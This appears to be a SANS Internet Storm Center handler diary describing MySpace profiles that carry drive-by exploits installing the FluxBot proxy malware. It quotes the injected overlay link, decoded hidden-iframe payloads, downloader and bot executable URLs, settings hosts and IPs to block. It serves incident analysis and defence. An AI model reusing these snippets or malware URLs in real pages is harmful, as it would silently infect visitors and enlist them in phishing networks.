Threat Level: green Handler on Duty: Jim Clausing

SANS ISC: MySpace Flux Malware - SANS Internet Storm Center SANS ISC InfoSec Forums


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
MySpace Flux Malware

CAREFUL! This diary contains links to malicious code!

A number of MySpace profiles include drive by exploits.  The exploits will install a version of "flux bot", a very popular proxy network bot.

  FluxBot (aka "FastFlux", "Storm") is typically used to hide phishing and malware delivery sites behind complex ever changing networks of proxy servers. A system infected with FluxBot will be used a one of these proxies.

  Infected MySpace "Friend IDs": 39184135, 171598920, 22057010

  A typical excerpt from an infected profile (obfuscated to protect the innocent): 

 

<a style="text-decoration:none;;top:1px;left:1px;"
href="http://home. myspace. com. index. cfm. fuseaction.user.MyToken.
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.dusanbut.com/login.php"><img
style="border-width:0px;width:1280px;height:220px;"
src="http://x.myspace.com/images/clear.gif"></a></style>



   The actual exploit / malware is served via an existing flux network. *.dusanbut.com will redirect the user to an encoded javascript which decodes to:

<script>window.status="Done"</script>
    <iframe src="http://fafb4c4c .com/header_03.gif" width=1
height=1></iframe>
   The domain used here is of course again served via flux. header_03.gif

 

<script>window.status="Done"</script>
    <iframe src="http://fafb4c4c .com/routine.php" width=1
height=1></iframe>


   Are we there yet? yup. just one more (patched) Internet Explorer exploit to go. The
exploit will install the .exe. For example:

http://fafb4c4c .com/session.exe (this is just the downloader stub)

The downloader will now retrieve the actual bot. We have seen among others these
URLs:

http://www.myfiles .hk/exes/webdl3x/weby.exe
http://www.myfiles .hk/exes/webdl3x/oly.exe


Settings for the bot can be found here:

http://settings.iconnectyou .biz
http://fcs.camgenie .com/weby7.exe

once its all set and done, you will be a proud new member of the flux net and soon you
will find your system to participate in phishing and similar endevours.

Couple IPs that may be worthwhile to block:

AS13767   | 72.232.254.218 
AS15083   | 65.111.176.176
AS25761   | 72.20.18.86    
AS25761   | 72.20.6.10   

As you can imagine, its a lot of messy work to decode all of this. I am just the messenger. This is work done by members of our great handler team.

 

 

 

Johannes

3036 Posts
ISC Handler

Sign Up for Free or Log In to start participating in the conversation!